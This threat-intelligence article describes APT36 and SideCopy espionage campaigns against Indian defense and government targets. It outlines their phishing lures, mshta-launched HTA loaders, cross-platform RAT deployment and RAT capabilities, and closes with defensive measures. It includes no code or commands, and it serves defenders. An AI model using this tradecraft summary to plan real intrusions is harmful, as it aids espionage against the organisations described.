top of page
Buscar

APT36 & SideCopy: Cross-Platform Espionage Against Indian Strategic Targets

  • Foto del escritor: Javier Conejo del Cerro
    Javier Conejo del Cerro
  • hace 15 minutos
  • 3 Min. de lectura

Indian defense entities, government-aligned organizations, research institutions, and critical infrastructure operators are facing coordinated cross-platform espionage campaigns attributed to Pakistan-linked threat clusters APT36 (Transparent Tribe) and SideCopy.

Rather than introducing radically new techniques, these actors are refining well-established tradecraft: phishing-led initial access, multi-stage loaders, memory-resident execution, and stealth-optimized remote access trojans (RATs).

Their current toolkit—Geta RAT, Ares RAT, and DeskRAT—demonstrates deliberate cross-platform capability across Windows and Linux environments, reinforcing a long-term intelligence collection objective rather than disruptive sabotage.


Phase 1: Initial Access & Social Engineering 


The campaigns begin with carefully crafted phishing emails targeting defense and government-adjacent personnel. These lures frequently impersonate official communications or defense-themed documents to increase credibility within India’s strategic ecosystem.

Delivery mechanisms include:

  • Malicious LNK shortcut files

  • Embedded download links to attacker infrastructure

  • ELF binaries targeting Linux systems

  • Rogue PowerPoint Add-In files with embedded macros

Once opened, these artifacts initiate the execution chain, often invoking trusted Windows utilities such as mshta.exe to retrieve and execute remote HTA payloads, or launching Go-based binaries in Linux environments.

The use of legitimate system tools significantly lowers detection noise and blends activity into normal administrative workflows.


Phase 2: Multi-Stage Loader Execution & Payload Deployment 


After initial execution, the attack transitions into a layered loader process:

  • HTA files containing JavaScript decrypt embedded DLL payloads

  • Decoy PDFs are written to disk to reduce suspicion

  • Hard-coded C2 connections are established

  • Security product checks are performed to adapt persistence mechanisms

Depending on the target platform, different RAT families are deployed:


Windows Path


  • Geta RAT

  • DeskRAT (Golang-based, delivered via malicious PowerPoint Add-Ins)


Linux Path


  • Go binary dropper

  • Shell script execution

  • Deployment of Python-based Ares RAT

This modular branching demonstrates operational maturity and environment awareness, ensuring the correct payload aligns with the victim’s operating system.


Phase 3: Persistence, Command & Control, and Data Collection 


Once deployed, the RATs establish persistent remote access and maintain communication with attacker-controlled C2 servers.

Capabilities across the malware families include:

  • System reconnaissance and enumeration

  • Credential harvesting

  • Running arbitrary shell commands

  • Listing and terminating processes

  • Enumerating installed applications

  • Clipboard manipulation (including data replacement)

  • Screenshot capture

  • File system access and manipulation

  • USB device data harvesting

  • Execution of attacker-supplied scripts

  • Continuous C2 communication for long-term operations

The objective is not immediate destruction, but quiet, sustained intelligence collection and operational foothold expansion.


Operational Characteristics


What distinguishes these campaigns is not novelty but refinement:

  • Cross-platform coverage (Windows + Linux)

  • Memory-resident and multi-stage execution

  • Abuse of trusted utilities (mshta, macros, PowerPoint Add-Ins)

  • Regionally trusted infrastructure

  • Defense-themed lure documents

This model enables the actors to operate below the typical detection threshold while maintaining strategic focus on Indian defense and policy sectors.


Defensive Measures 


To mitigate this threat model, organizations should implement layered controls:

  • Harden email gateways with advanced phishing detection

  • Block or strictly restrict macro execution

  • Monitor and alert on suspicious LNK and mshta.exe usage

  • Audit and restrict PowerPoint Add-Ins

  • Deploy cross-platform EDR covering Windows and Linux

  • Monitor outbound traffic for anomalous C2 patterns

  • Enforce least privilege and review legacy permissions

  • Inspect HTA execution and script interpreter abuse

  • Monitor USB device access activity

  • Implement behavioral detection for memory-resident multi-stage loaders


Detection strategies must focus on behavior chains rather than single payload signatures.

APT36 and SideCopy are not reinventing espionage—they are optimizing it. By expanding cross-platform coverage and refining multi-stage delivery pipelines, they ensure resilient, stealth-oriented access into Indian strategic environments. The use of Geta RAT, Ares RAT, and DeskRAT illustrates an ecosystem designed for persistence, reconnaissance, and long-term intelligence collection rather than short-term disruption.


For defenders, the key takeaway is clear: modern espionage campaigns thrive on blending into legitimate workflows. Visibility into script execution chains, cross-platform telemetry, and outbound C2 behavior is essential to disrupt operations that are intentionally engineered to stay quiet.


The threat is not loud. It is deliberate.



The Hacker News


 
 
 
bottom of page